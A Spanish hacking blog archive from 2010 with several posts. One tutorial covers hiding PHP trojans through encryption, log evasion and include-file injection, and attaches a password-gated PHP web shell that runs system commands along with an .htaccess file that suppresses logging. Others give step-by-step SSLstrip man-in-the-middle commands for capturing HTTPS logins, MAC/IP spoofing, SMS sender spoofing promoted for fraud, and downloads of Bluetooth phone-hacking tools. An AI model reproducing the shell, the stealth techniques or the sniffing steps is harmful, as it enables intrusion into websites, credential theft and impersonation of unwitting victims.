31 de mar. de 2010

Introducción a los troyanos en PHP

|=------------------------------------------------------------------------------=|
|=-----------------=[Introducción a los troyanos en php]=-----------------------=|
|=---------------------------=[ 28 enero 2010 ]=--------------------------------=|
|=------------------------=[  Por shad0w_crash  ]=------------------------------=|
|=-----------------------=[  Traducido por seth  ]=-----------------------------=|
|=------------------------------------------------------------------------------=|

Indice


1) Introducción
2) Suposiciones
3) Encriptación del código
4) Ocultamiento de la petición
5) Inyección
6) Medidas
7) Contacto


Adjunto 1: Troyano sencillo en php
Adjunto 2: .htaccess



1. Introducción
Este es mi segundo tutorial así que sentite libre de enviarme comentarios. El objetivo de este texto es proveer un poco de teoría sobre la creación de troyanos en lenguajes de scripting (en este caso php). No todos los ejemplos están completamente discutidos, así que hay lugar para el debate.
Todo el tema de escribir troyanos es un gran tabú, espero que escribiendo este documento pueda haber un poco de discusión. No quiero quiero que los sitios web sean infectados por troyanos, por eso escribí un montón en pseudo código y no hice una versión que funcione (por favor, no hagas una).



2. Suposiciones
Para lograr un troyano en php menos detectable, tenemos algunas dificultades:

* Cuando accedés a el, la petición aparece en los archivos de log.
* Cuando aparece un archivo adicional en el directorio web, puede a ser detectado por alguien.
* Cuando agregás código a un index, lo puede ver un programador.
* Cuando agregás código a un index, este va a ser sobrescrito en la próxima actualización.

Este texto no va a solucionar todos esos problemas. Para dar una mejor visión general hice algunas suposiciones:

* Cuando se actualiza una aplicación web y todos los archivos son reemplazados, probablemente se den cuenta de que algo le pasó al código y tu troyano no va a durar mucho tiempo. Para hacer mejores troyanos, no tenes que estar en este nivel del sistema operativo.
* Si el webmaster calcula los hashes de los archivos y los compara periódicamente, los métodos descritos no van a funcionar (se que se puede solucionar encontrando colisiones pero eso es muy complicado).
* El webmaster no puede crackear (T)DES, GOST, AES, etc.



3. Encriptación del código
Para crear un troyano en PHP dificil de detectar, necesitamos tener uno que funcione para usarlo de base (ver adjunto 1). El funcionamiento de este troyano menos detectable es encriptando el original. El código encriptado es guardado en una función (desde ahora la vamos a llamar f1) que:

1) Desencripta el archivo y lo pone en un .php con nombre aleatorio.
2) Envia la petición original a ese archivo temporal.
3) Elimina el archivo.

Con esto solucionamos algunos problemas. El programador no conoce y no puede conocer que hace la función. Tampoco lo van a hacer las herramientas que analizan el código, porque la unica forma es desencriptando la cadena, con la contraseña. También f1 puede ser insertado en index.php, indicando que la función solo debe ser ejecutada si una variable específica está activada (si no, todas las peticiones al archivo invocarian al troyano).

El mejor lugar para poner esta función son archivos como newsletter.php y login.php, ya que los archivos de librerias y el index son actualizados frecuentemente.



4. Ocultamiento de la petición
Un desafió que quedó, es evitar que todas las peticiones aparezcan en los logs. Voy a diferenciar dos peticiones, la primera es al archivo que contiene f1 y la segunda es la que f1 le hace al archivo temporal desencriptado.

Cuando ves una petición http normal hay mucha mas información que solo el GET o el POST. Pueden ser usadas un monton de cabeceras como Accept-Language, User-Agent, etc [1]. Usando getallheaders() podes verlas todas. Tenemos dos opciones:
* Extender nuestra petición con un nuevo valor (violando el RFC, pero con menos chances de que aparesca en los logs.
* Usar un valor elejido para algo en el RFC (y abusarlo, entonces hay mas chances de que un IDS lo detecte)

La función ahora puede obtener sus variables para autentificarse y ejecutar el proceso interno.
** ADVERTENCIA ** esto es seguridad por oscuridad. Es posible sniffear y repetir el ataque. Incluso cuando el servidor usa ssl, hay posibilidades de que el administrador haya puesto una herramienta que lo registre. Entonces, el podria repetir el ataque y darse cuenta de que hay un troyano.
Para evitar esto tenemos que enviar una variable extra al servidor un nuevo hash sha512 que reemplace al anterior. Así seria imposible repetir el ataque porque la contraseña funciona una sola vez.
La segunda petición es mas facil de esconder, para eso vamos a extender f1:
1) Crea un directorio con nombre aleatorio.
2) Escribe el .htaccess en ese directorio.
3) Desencripta el troyano en un archivo temporal con nombre aleatorio, en el directorio anterior.
4) Envia la petición original al archivo temporal.
5a) Elimina el archivo temporal
5b) Elimina el .htaccess
5c) elimina el directorio
De esta forma, no van a quear rastros en el log de acceso.



5. Inyección
Ahora que sabemos como esconder el troyano y como ocultarlo (lo mas posible), necesitamos un lugar para guardarlo. Al principio mencioné que puede estar en index.php o algun archivo similar, pero hay formas mas eficientes. Vamos a crear un script que haga lo siguiente:

1) Buscar una llamada a la función include()
2a) Tomar aleatoriamente dos archivos de los que se incluyen
2b) Si no se encuentran, se trabaja sobre el archivo actual
3) Buscar en el archivo variables de f1
4a) Si no coincide, insertar f1
4b) Si coincide, reemplazar variables en f1 y despues insertar la función



6. Medidas
Lo mejor que podes hacer para no ser infectado por un troyano web es mantener el software actualizado. Cuando tu sitio no es explotable, hay menos posibilidades de ser infectado. También, podes crear una lista con hashes de los archivos, guardarla en una computadora remota y compararlos periódicamente. De esta forma te vas a enterar de los cambios en los archivos.


7. ContactoSi tenes algo que añadir, simplemente copiá el texto y envialo al sitio de donde lo sacaste. Para contactarme: http://twitter.com/shad0w_crash (NdT: el habla en inglés, para contactarme a mi http://elrincondeseth.wordpress.com/ o "xd punto seth ar@ro@ba gmail p.u.n.t.o com")



Attach 1: Most easy PHP trojan.

Adjunto 1: Troyano sencillo en PHP.
error_reporting(0);

<?php
error_reporting(0); 
$action = $_GET['cmd'];
$pw = $_GET['pw']; 
$password = "7a3b4197c700b7a94efef0a0590f465664ff210e120156a8c70913c1302fc06fa1bc85cffbf2fb113f99323f08e91489dd4531a0c3657b22fdc065f87b799f5b";
/* Remove this line!, password= Hasdf4g */
if( hash('sha512',$pw) == $password)
{
 echo system($cmd); 
}
?>

Attach 2: .Htaccess.

Adjunto 2: .htaccess.

SetEnvIf Request_URI "^/tmpdir/tempfile\.php$" dontlog
<Limit GET POST HEAD>
order deny,allow
deny from all
allow from 127.0.0.1 (or the remote ip of the server).
</Limit>

La primer regla evita los logs de acceso para el archivo.
La segunda solo permite peticiones por el servidor mismo.


[1]: http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html

Fuente: http://www.exploit-db.com/

30 de mar. de 2010

Los 10 principales puestos en las operaciones cibercriminales según la FBI

WASHINGTON - Las organizaciones de hackers criminales están operando con un aumento de la eficiencia, especialización y habilidad tal como hacen las empresas, según informa el FBI.

Desde una perspectiva empresarial, estas empresas criminales son altamente productivas y dotadas de personas dedicadas dispuestas a operar en todo el mundo, las 24hs., "sin feriados, fines de semana o vacaciones", según Steven Chabinsky, director adjunto de la división cibernética del FBI. "Como resultado, cuando se les presenta una oportunidad a estos criminales pueden empezar a planificar en cuestión de horas."

"El mundo clandestino cibernético ahora consiste en expertos en la materia que pueden centrar todo su tiempo y energía en la mejora de sus técnicas, sus productos y servicios", dijo hoy Chabinsky a una audiencia en la conferencia FOSE, una feria del gobierno de TI , que se celebró aquí.

Durante la presentación, Chabinsky presentó la lista de las 10 posiciones principales en las organizaciones cibercriminales. Estos son:

1. Codificadores / programadores, que escribe los exploits y el malware utilizado por la empresa criminal. Contrariamente a la creencia popular, Chabinsky señaló que los codificadores que, a sabiendas, participan en una empresa criminal no están protegidos por la Primera Enmienda.

2. Distribuidores, quienes comercian y venden datos robados y actúan como vales por la mercancía puesta a disposición por otros especialistas.

3. Expertos en tecnología, que mantienen la infraestructura de TI de la empresa criminal, incluyendo servidores, tecnologías de cifrado, bases de datos, etc.

4. Los hackers, que buscar y explotan las aplicaciones, sistemas y vulnerabilidades de la red.

5. Los estafadores, que crear e implementar diversos planes de ingeniería social, tales como el phishing y el spam.

6. Proveedores de sistemas hospedados, que ofrecen alojamiento seguro de servidores y sitios de contenido ilícito.

7. Cajeros, que controlan las cuentas destino y suministrar nombres y cuentas a otros criminales por una tasa.

8. Mulas de dinero, que completan transferencias entre cuentas bancarias. Las mulas de dinero pueden utilizar los estudiantes y visas de trabajo para viajar a los EE.UU. para abrir cuentas bancarias.

9. Contadores, quienes se encargan de transferir y blauqear las ganancias ilícitamente obtenidas mediante servicios digitales de cambio de divisas y monedas de distintas partes del mundo.

10. Líderes de la organización, a menudo "gente sociable" sin conocimientos técnicos. Los líderes de armar el equipo y elegir los objetivos.

Traducción: Raúl Batista - Segu-info
Autor: Patrick Thibodeau


Fuente: http://blog.segu-info.com.ar/

29 de mar. de 2010

[Metasploit] Guía de Usuario en Español

La siguiente Guía de Usuario de Metasploit es gratuita y puede verla desde este enlace en ingles http://www.metasploit.com/documents/users_guide.pdf. No se ha modificado el contenido de la Guía de Usuario, la traducción sigue manteniendo el contenido del mismo. Esta guia es propiedad de Rapid7 LLC Copyright (c) 2008, simplemente nos limitamos a su traducción al Español.

Contenido:

P.D: Ésta todavía está en construcción...

[+] ZioneR

[Metasploit Unleashed] Tutorial en Español !!

El siguiente curso es gratuito y puede verlo desde este enlace en ingles, http://www.offensive-security.com/metasploit-unleashed/. No se ha modificado el contenido del curso, la traducción sigue manteniendo el contenido del mismo. Este curso es propiedad de Offensive Security 2009, simplemente nos limitamos a su traducción al Español.

METASPLOIT UNLEASHED - DOMINANDO EL FRAMEWORK

Este curso gratuito de seguridad informática es traído a ustedes con un esfuerzo de la comunidad para promover la concienciación y recaudar fondos para niños desfavorecidos en el este de África. A través del esfuerzo del corazón de varios profesionales de la seguridad, estamos orgullosos de presentar el más completo curso abierto sobre Metasploit Framework. 

Esta es la versión online gratuita del curso. Si le gusta y le resulte útil, le pedimos que hagan una donación a los HFC (hackers por la Caridad), 4,00 dólares alimenta a un niño durante todo un mes, por lo que cualquier contribución es bienvenida y realmente agradecida. Esperamos que disfrute de este curso tanto como nosotros disfrutamos haciéndolo. 

La versión "completa" de este curso incluye una guía en PDF (que tiene el mismo material que los videos wiki) y una serie de flash que guiará a pesar de los módulos. 

Debido a los cambios recientes en Metasploit Framework, el proceso de desarrollo esta en curso, estamos a la espera de la MSF para estabilizar y tener su conjunto completo de características que deben aplicarse. Vamos a anunciar el lanzamiento de los videos FFDU una vez que estén listos, estad atentos!

Índice:
1 Introducción
2 Materiales requeridos para el curso
2.1 Requisitos de Hardware
2.2 Ubuntu 7.04
2.3 Windows XP SP2
2.3.1 Archivos Requeridos
2.3.2 Configurando VMware
2.3.3 Post-Instalacion XP SP2
2.3.4 Servicios Adicionales
2.3.5 Crear una Aplicación Web Vulnerable
3 Interactuando con MSF
3.1 msfconsole
3.2 msfcli
3.3 msfgui
3.4 msfweb
4 Obteniendo Información
4.1 El Framework Dradis
4.2 Escaneo de Puertos
4.3 Plugins Auxiliares
4.4 Buscando MSSQL
4.5 Identificación de Servicios
4.6 Password Sniffing
4.6.1 Ampliando Psnuffle
4.7 SNMP Sweeping
5 Analisis de Vulnerabilidades
5.1 Verificacion de Login SMB
5.2 Autentificacion VNC
5.3 X11 a la escucha
5.4 Escaner Web WMAP
5.5 Trabajando con Nessus
6 Escribiendo un simple Fuzzer (No Traducir, Todo el Cap 6 - Ya traducido)
6.1 Simple Fuzzer TFTP
6.2 Simple Fuzzer IMAP
7 Desarrollando Exploits (No Traducir, Todo el Cap 7 - Ya traducido)
7.1 Escribiendo un Exploit
7.1.1 Obteniendo una Shell
7.2 Usando el Egghunter-Mixin
7.2.1 Completando el Exploit
7.3 Shellcodes-alfanuméricas
8 Client-Side Exploits
8.1 Payload binario
8.2 Antivirus Bypass
8.3 Troyanos Binarios para Linux
8.4 Infeccion de aplicacion Java
8.5 El ataque del lado del cliente
8.6 Kit de herramientas de la ingeniería social
8.7 Métodos infección VBScript
9 MSF Post Explotación (No Traducir, Todo el Cap 9 - ya traducido)
9.1 Metasploit como un Payload
9.2 PSExec Pass the Hash
9.3 Administración de registros
9.4 Jugando con Incognito
9.5 Interactuando con el Registro
9.5.1 Backdoor Netcat Persistente
9.5.2 Habilitando Escritorio Remoto
9.6 Packet Sniffing con Meterpreter
9.7 Pivoting
9.8 TimeStomp
9.9 Captura de pantalla
10 Scripting en Meterpreter (No Traducir, Todo el Cap 10 - ya traducido)
10.1 Estableciendo tu ambiente
10.2 Escribiendo scripts meterpreter
10.3 Custom Scipting
10.4 Llamadas API utiles
10.5 Funciones Utiles
11 Mantener el Acceso
11.1 Keylogging
11.2 Servicio de Meterpreter "Backdoor"
11.2.1 Interactuar con Metsvc
12 MSF Uso Extendido
12.1 Backdooring EXE files
12.2 Browser Autopwn
12.3 Karmetasploit
12.3.1 Configuration
12.3.2 Karmetasploit in Action
12.3.3 Attack Analysis
12.4 MSF vs OS X
12.5 File-Uploads Backdoors
13 Fast-Track (No Traducir Todo el tema traducido.)
13.1 Modos de Fast-Track
13.2 Actualizar Fast-Track
13.3 MSSQL Injection
13.4 MSSQL Bruter
13.5 Binay to Hex Converter
13.6 Mass-Client Attack
13.7 SQL PWNAGE
13.8 Payload Generator
14 Construyendo un Modulo (Traducir, Todo el Cap 14 - no traducido.)
14.1 Payloads a través de MSSQL
14.2 Creando Nuestro Modulo Auxiliar
14.3 The Guts Behind It
15 Dona Aqui (Ya traducido)
16 Glosario (Ya traducido)
16.1 Modulos
16.2 Recursos
16.3 Un Poco sobre Payloads
17 FAQ (Ya traducido)
18 Sobre los Autores (Ya traducido)


[+] ZioneR

[Meterpreter] Tutorial en Español !!

El siguiente manual de Meterpreter es gratuito y puede verlo desde este enlace en ingles http://www.nologin.org/Downloads/Papers/meterpreter.pdf. No se ha modificado el contenido del manual, la traducción sigue manteniendo el contenido del mismo. Este manual es propiedad de skape, simplemente nos limitamos a su traducción al Español. 

Metasploit’s Meterpreter
skape
mmiller@hick.org
Last modified: 12/26/2004

Contenido



[+] ZioneR

[Anubis] Automatización de los Procesos de Footprinting y Fingerprinting

Anubis es una aplicación desarrollada por Juan Antonio Calles para anexionar todas las herramientas necesarias para los procesos de las Auditorías de Seguridad dedicados a la búsqueda de información, denominados Footprinting y Fingerprinting, en una única herramienta.
Con ésta herramienta el auditor no solo conseguirá ahorrar tiempo durante la auditoría, sino que descubrirá nuevos elementos que de manera manual no podría gracias a las automatizaciones que lleva Anubis incoporadas. Además, Anubis ha sido desarrollado pensando en las implantaciones de la ISO/IEC 27001 en las organizaciones, sirviendo para ayudar en las labores de implantación del estándar.
La recopilación de herramientas/técnicas son las siguientes:
  • Fuzzing http
  • Whois
  • Google Hacking
  • Banner Attack
  • Tracert
  • 404 Attack
  • Scan with Google
  • Fuzzing against DNS
  • Zone Transfer
  • Scan IP against DNS
  • Nmap
Los resultados de cada una de estas consultas nos generarán un reporte final detallando con cada uno de estos.




Para más información y descarga de Anubis (Página oficial del proyecto)

Fuente: http://www.sec-track.com/

25 de mar. de 2010

Crean chip que convierte cualquier televisor en un escritorio virtual

La compañía NComputing anunció el desarrollo de un chip por medio del cual es posible convertir cualquier televisor o set-top box en un escritorio virtual, con lo cual los usuarios podrán ejecutar aplicaciones Windows o Linux.

El chip forma parte de una familia aglutinada bajo el nombre de Numo y consta de un procesador doble núcleo basado en la arquitectura ARM, formando un sistema SoC (System on Chip) que hace uso de la aplicación Vspace de Ncomputing para establecer un enlace con una máquina anfitriona (ya sea un computador o un servidor).

Una vez establecida la comunicación los dispositivos dotados del chip Numo se transforman en clientes livianos con la suficiente capacidad para ejecutar distintas aplicaciones.
El sistema también puede ser implantado en netbooks y otros dispositivos, incluso es capaz de ejecutar el Sistema Operativo Android. Anteriormente la compañía ya había ofrecido una solución similar que venía integrada en monitores  LG, pero ahora expande su uso para que pueda ser instalado en cualquier dispositivo con un costo de sólo USD$ 20.

Fuente: http://www.fayerwayer.com/

[Manual] Para Construir Antena Wifi

Manual experimental de construcción de antenas Wifi de forma profesional en PVC:



Formato: PDF
Size: 3 MB
DOWNLOAD

Autor: Norbert R. Ibañez

22 de mar. de 2010

Tutorial SSLstrip

SSLstrip nos permite sniffar usuarios y contraseñas encriptadas en HTTPS. Esto lo hace realizando un ataque MITM entre el servidor y nuestro objetivo conectandose al servidor mediante HTTP (sin encriptar) en lugar de HTTPS (encriptado) con lo que los datos son visibles. Algunos ejemplos de páginas que utilizan esta encriptacion son Gmail o Tuenti.

Bueno primero nos descargamos un script en python desde:
http://www.thoughtcrime.org/software/sslstrip/index.html

O la descarga directa:
http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.7.tar.gz

Una vez descargado lo extraemos y obtendremos como resultado una carpeta llamada sslstrip-0.6 (la version actual).

A continuación abrimos una shell y ponemos:
echo "1" > /proc/sys/net/ipv4/ip_forward

Ahora realizamos el ataque MITM:
# arpspoof -i {interfaz_red} -t {ip_victima} {ip_router}

A modo de ejemplo:
#  arpspoof -i wlan0 -t 192.168.1.100 192.168.1.1

Abrimos otra shell y cambiamos la redireccion de puertos usando las iptables:
# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000

Una vez echo lo anterior lanzamos el SSLstrip:
# python sslstrip.py -w {nombre_del_archivo_de_captura}

A modo de ejemplo:
# python sslstrip.py -w morsa

Volvemos a abrir otra shell si queremos ver en tiempo real la informacion obtenida
# tail -f {nombre_del_archivo_de_captura}

A modo de ejemplo
# tail -f morsa

Para terminar si posteriormente queremos ver los archivos del fichero de captura hacemos:
nano {nombre_del_archivo_de_captura}

O a modo de ejemplo:
# nano morsa

Autor: Aetsu
Fuente: http://foro.portalhacker.net/

18 de mar. de 2010

Suplantar Dirección IP y MAC (Spoofing en Windows)

Objetivo: Suplantar Dirección IP y MAC

Preparación:

  • Una maquina con Windows
  • Conexión a Red
  • Tener una máquina para spoofearla.
Herramientas:
  • Símbolo del Sistema
  • Etherchange.exe
  • Guía:
1) Abrimos un símbolo del Sistema y escribimos el siguiente comando Ipconfig /all > nombreArchivo.txt o si solo queremos ver la configuración y no guardarla en un archivo .txt solo damos Ipconfig /all

Ipconfig /all= Esta nos muestra la configuración completa de las tarjetas de red, nos muestra puerta de enlace, servidor DNS primario y secundario, configuración Proxy, etc.



2) Vamos al directorio en mi caso C:\Documents and Settings\avanzado, y miramos que nuestro archivo red.txt este en el directorio, esta seria la configuración de nuestra maquina.



3) Ahora descargamos la herramienta Etherchange.exe desde http://www.ntsecurity.nu/downloads/etherchange.exe



4) Después de haber descargado Etherchange.exe lo copian al directorio en mi caso C:\Documents and Settings\avanzado para ejecutarlo desde el símbolo de sistema. Y damos la opción número 1





5) En la siguiente opción también le damos la numero 1, para poner la MAC de la otra maquina y así suplantarla o spoofearla. La dirección MAC de la otra maquina ustedes ya la tienen que tener, la ponemos sin separaciones ni nada.
Ejemplo: 00218574D5CD



6) Después de ponerla nos arroja un mensaje de que esa es nuestra nueva dirección Ethernet.



7) Si tenemos habilitado el DHCP debería también tomarnos la IP de la maquina a spoofear, si la tenemos estática la tendremos que cambiar a DHCP.

8) Ahora desactivamos y activamos el adaptador de red que estemos utilizando.




9) Como podrán observar desde un principio mi MAC y mi IP eran estas. Pero,gracias al Etherchange las cambie.


10) Ahora ejecutamos ipconfig /all para verificar que ya estamos navegando con la MAC y la IP de la maquina spoofeada.


y listo!!!!


Fuente: http://foro.portalhacker.net/

Nuevo template

Bueno... este template lo realicé con la nueva utilidad de blogger, que es Blogger in Draft que sirve para crear nuestros propios templates...

Si ingresas por blogger.com, por ahora no se verá la nueva funcionalidad, pero tenéis que ingresar poe draft.blogger.com y aparecerá algo como esto:


Aquí un vídeo demostrativo:


[+] ZioneR
[+] Salu2

Introducción a los shellcodes en Linux

Una buena explicación de lo que son los shellcodes, recomendable para los que se quieran iniciar en este tema:


[+] ZioneR

17 de mar. de 2010

51 artículos de Revista Hakin9

 Aquí una recopilación con 51 de los mejores artículos de la famosa revista de hacking Hackin9:

Contenido de Articulos:

• Hakin9 - Abusos de las cadenas de formato
• Hakin9 - Administrado la Inseguridad Informática
• Hakin9 - Almacenamos datos confidenciales en GNU/Linux
• Hakin9 - Análisis del funcionamiento de programas sospechoso
• Hakin9 - Análisis del tráfico en red
• Hakin9 - Análisis estático del código ejecutable ELF
• Hakin9 - Anti-Sniffing, Privacidad y VPN
• Hakin9 - Ataque man-in-the-middle en Jabber
• Hakin9 - Ataques avanzados de puerta trasera en Linux
• Hakin9 - Ataques de tipo HTML injection
• Hakin9 - Automatizando el proceso de explotación en Linux x86
• Hakin9 - Blind TCP connection reset
• Hakin9 - Como se envia un Spam
• Hakin9 - Conociendo distintos tipos de protocolos
• Hakin9 - Crear el shellcode polimórfico
• Hakin9 - Criptografía 30 años despues
• Hakin9 - Criptografía de Curva Elíptica: Ataque de Rho de Pollard
• Hakin9 - Defensa contra Fingerprinting de la capa de aplicación
• Hakin9 - Desarrollo de shellcodes en Python
• Hakin9 - Desbordamiento de la pila en Linux x86
• Hakin9 - Desconfianza digital
• Hakin9 - Detectando backdoors silenciosos
• Hakin9 - El desvio de los cortafuegos de red
• Hakin9 - Empleo de errores del mecanismo de mensajes de Windows
• Hakin9 - Engañamos SPF
• Hakin9 - Evitamos cortafuegos
• Hakin9 - Google peligroso búsqueda de datos confidenciales
• Hakin9 - Hackea Windows Vista
• Hakin9 - Honeypots - Worm Traps
• Hakin9 - ICMP redirect
• Hakin9 - Introducción a las técnicas de Xpath Injection
• Hakin9 - IPS System Based on Snort
• Hakin9 - Librería libproc - Punto débil de muchos sistemas
• Hakin9 - Los ataques DDoS
• Hakin9 - Network defense
• Hakin9 - Optimización de los shellcodes en Linux
• Hakin9 - Oracle desde el punto de vista del intruso
• Hakin9 - Pharming DNS cache poisoning
• Hakin9 - Port-knocking con SendIP y TCPDump
• Hakin9 - Problemas con autenticación HTTP
• Hakin9 - SEC for Real-time Security Log Monitoring
• Hakin9 - Seguridad VoIP Protocolos SIP y RTP
• Hakin9 - Seguridad WiFi - WEP, WPA y WPA2
• Hakin9 - Seleccionadas técnicas de omitir cortafuegos
• Hakin9 - Smart Spoofing
• Hakin9 - Sniffing en redes conmutadas
• Hakin9 - SQL Injection Attacks
• Hakin9 - Trucos comerciales de los spammers
• Hakin9 - Uso impropio de Usenet
• Hakin9 - Utilizando Snort_inline
• Hakin9 - Wardriving

DESCARGA

Fuente: http://foro.latinohack.com/

12 de mar. de 2010

[SMS Spoofing] Tutorial: falsear remitente de SMS

ZioneR: Bien... no me acuerdo de donde saqué este tip... Pero lo importante es que sirve para enviar mensajes de texto gratuitos y falseados.
Lalo: Que? osea que puedes enviar un sms como si fueras otra persona ??
ZioneR: Sip...
Lalo: Wuaaauuuuu !!.. como se hace ??

Bien... hay una web que ofrece el servicio de envió de sms´s gratuitos a todos los países con un pequeño plus, se puede poner cualquier numero de remitente, lo que lo transforma en una herramienta excelente de ingeniería social, hacer bromas, cometer fraudes, etc, lo que su mente maestra diga...

Es bastante simple, se hace con 2 simple pasos:

Registrarse en:

Nos llegara al correo un mail con los datos de acceso los cuales tenemos que logearlos en:
 

Esta la web desde donde mandaremos los SMS:

Texto del mensaje: donde va el mensaje obviamente.
En teléfono/s: Escribimos el numero o los números a los que llegara el SMS.
En Remitente: El numero que falsificaremos para que llegue como si fuera de él.
Creditos disponibles: 2.64: son los creditos que nos regalan y se acaban.

Lalo: que pasa si se acaban los creditos?
ZioneR: te haces otra cuenta pero con otro e-mail :-).

Escribimos los SMS con código internacional:
EJEMPLO: +569993210000
El + es el símbolo internacional.
56 es código de Chile.
9 es código de ciudad de Santiago.
993210000 es el n° de celular.

[+] ZioneR

11 de mar. de 2010

AIO Mobile Bluetooth Hacking Tools 2010


Una vez conectado a un teléfono a través de Bluetooth, puede:
  • Leer sus mensajes.
  • Leer sus contactos.
  • Cambiar perfil.
  • Cambiar el ringtone incluso si está en silencio.
  • Escuchar sus canciones (en su teléfono).
  • Reiniciar el teléfono.
  • Apagar el teléfono.
  • Restaurar la configuración de fábrica (Resetear).
  • Cambiar el volumen del timbre.
  • Y llamar por su teléfono.

Descarga: http://hotfile.com/dl/24961708/776d57d/AIO_M0bile_Bluetooth_Hacking_Tools_2010.rar.html

Fuente: http://www.mobilesofty.com/

[Nmap 5] CheatSheet

Un CheatSheet son apuntes sobre algún tema (como por ejemplo Nmap 5) resumidos y directo al clavo, con la idea de que nos ayude a recordar una sintaxis en especial (de esas que siempre se nos olvidan) y caben por lo general en 1 sola pagina (poco extenso), o sea es una especie de machete, chuleta, torpedo, acordeone, etc... En cada país tiene un nombre distinto.

Bueno, hoy les traigo un CheatSheet de Nmap 5 elaborado por Security by Default que está bastante completo y resumido, sin duda muy recomendable imprimirlo y tenerlo a mano en caso de tener que utilizar el Nmap...

La versión en español:
http://sbdtools.googlecode.com/files/Nmap5 cheatsheet esp v1.pdf

La versión en inglés:
http://sbdtools.googlecode.com/files/Nmap5 cheatsheet eng v1.pdf

Fuente: http://www.securitybydefault.com/

Scanners (win32)

Navegando por foro.portalhacker.net me encuentro con una recopilación y descripción muy bien hecha de Escaneadores de Puertos e IP's para win32, disfrutenlos:

Bueno aquí una lista de programas escaners  de Puertos e IP's , claro hay una infinidad de programas de este tipo pero estos son las más usadas , si hay otros Tools que conoce usted  , no dude en responder y aumentar en este post  para crear un post de aportes. Hasta pronto.


1st Ip Port Scanner 2.0



"Escaneador de puertos y de direcciones IP. También tiene funciones para seguir las rutas hasta una IP." 

1st IP Port Scanner es un programa completo para escanear y buscar información sobre IPs. Puede escanear un rango de direcciones IP para encontrar aquellas que estén siendo utilizadas, escanear, para cada IP, los puertos que tiene activados, y buscar un puerto concreto. Además, también puedes hacer un trace de una IP, es decir, ver la ruta que sigue la información desde tu ordenador hasta dicha IP.

1st IP Port Scanner sirve para comprobar si una máquina remota está activa, y si puertos concretos UDP o TCP están siendo utilizados.

El programa también puede dar el nombre del host al que pertenece una IP, lo que se conoce como "reverse lookup". 

DESCARGA: http://directa.portalprogramas.com/scanner.exe

Spuertos 2.9


Spuertos nos informa de los puertos que tenemos abiertos y que pueden ser objetivo de los hackers: por ejemplo, si estamos ejecutando un servidor de FTP, un servidor Web, un servidor Telnet, o cualquier otro tipo de servidor.

Tiene la posibilidad de chequear una red de ordenadores especificando el rango de direcciones IP a comprobar, asi como ver las distintas direcciones IP que tiene un determinado ordenador y chequearlas individualmente.

Spuertos también permite comprobar los accesos que otros usuarios realizan a un puerto de nuestro ordenador. 

DESCARGA: http://www.terra.es/personal/ace_goy/webie/descarga/spuertos.zip 

Serial Port Monitor 4.0.2.281


"Serial Port Monitor analiza todos los puertos de tu ordenador para buscar errores."

Serial Port Monitor analiza todos los puertos de tu ordenador para buscar errores y verificar su correcto funcionamiento.

No solo puedes chequearlos, sino que Serial Port Monitor acumula la información que a través de ellos circula, teniendo respaldo para puertos COM: RS232/422/485.

Si quieres tener una planilla de los datos guardados, puedes exportarlos a un HTML o a algún archivo de texto. 

DESCARGA: http://www.com-port-monitoring.com/download/serial_port_monitor.exe 

FreePortScanner 2.7


En ordenadores rápidos, puedes escanear un rango determinado de puertos en pocos segundos.

La herramienta está diseñada de forma que sea sencilla de usar. Sólo tienes que configurar dos parámetros: la IP del servidor a analizar y el listado de puertos. Estos puertos pueden ser puertos concretos, o bien un rango.

El programa analizará el servidor indicándote los puertos que están abiertos y los que están cerrados. Además, te da una descripción de cada puerto que te ayuda a averiguar para qué sirve. 

DESCARGA: http://www.nsauditor.com/freeware/downloads/FreePortScanner.exe

NetworkActiv Port Scanner


Este scanner de puertos es bastante completo, pero algo complejo. Es interesante para usuarios expertos que buscan un programa donde puedan definir configuraciones técnicas para realizar los escaneos. Desde la ventana principal podemos realizarlas todas, por ejemplo podemos configurar el timeout, opciones varias para UDP, TCP...
Además de las opciones habituales para analizar un rango de IPs, o de puertos, incorpora otras opciones: incorpora herramientas de red como búsquedas de DNS o Whois. 

DESCARGA: http://directa.portalprogramas.com/NetworkActivPortScannerV4.0.exe 

Shadow Security Scanner



Shadow Security Scanner es una herramienta que se encarga de escanear y analizar las vulnerabilidades de un sistema operativo; funciona en Windows, Unix, Linux, FreeBSD, OpenBSD y Net BSD.

Shadow Security Scanner escanea, entre otros, los siguientes componentes: NetBIOS, HTTP, CGI y WinCGI, FTP, DNS, DoS vulnerabilities, POP3, SMTP, LDAP, TCP/IP, UDP, registro, servicios, usuarios y cuentas, password vulnerabilidades, MSSQL, IBM BD2, Oracle, MySQL, PostgressSQL, Interbase, MiniSQL...

SSS emplea un algorismo de análisis de sistemas bastante potente. El programa lleva a cabo el escaneado del sistema de forma rápida. Una vez que se ha concluido el análisis verás un informe con todas las vulnerabilidades encontradas y las soluciones para eliminarlas. 

DESCARGA: http://mirror1.safety-lab.com/SSS.exe

Nmap Security Scanner version 5.00.


Nmap es un programa de código abierto que sirve para efectuar rastreo de puertos escrito originalmente por Gordon Lyon (más conocido por su alias Fyodor Vaskovich). Se usa para evaluar la seguridad de sistemas informáticos, así como para descubrir servicios o servidores en una red informática.

Características

    * Descubrimiento de servidores: Identifica computadoras en una red, por ejemplo listando aquellas que responden ping.[1]
    * Identifica puertos abiertos en una computadora objetivo.
    * Determina qué servicios está ejecutando la misma.
    * Determinar qué sistema operativo y versión utiliza dicha computadora, (esta técnica es también conocida como fingerprinting).
    * Obtiene algunas características del hardware de red de la máquina objeto de la prueba. 

DESCARGA: http://nmap.org/dist/nmap-5.00-setup.exe

Angry IP Scanner


A pesar de que a simple vista el tema del análisis de puertos y escaneo de IPs puede dar a pensar en usos no legales, hoy nos centraremos en la aplicación que se da en el terreno de la administración de sistemas.

Ya sea porque eres nuevo en el trabajo (y quien administraba antes no lo tenía documentado) o porque simplemente necesitas saber cuál es la infraestructura de la red donde estás trabajando, Angry IP Scanner puede llegar a ser un programa de gran utilidad.

Este simple y ligero software (no precisa de instalación) nos permite realizar escaneos de rangos IP de donde podemos llegar a sacar mucha información: dirección MAC de los ordenadores, nombre de la máquina, puertos abiertos… Es más, el programa puede ampliarse con librerias DLLs que nos permitirán conocer nuevos parámetros, como pudieran ser todos los recursos compartidos de cada uno de los dispositivos de red.

El programa tiene licencia GPLv2 y es multiplataforma en la versión 3.x (en fase Beta), en cuanto a la versión estable, la 2.x tan sólo es para Windows. 

DESCARGA: http://sourceforge.net/projects/ipscan/files/ipscan3-binary/

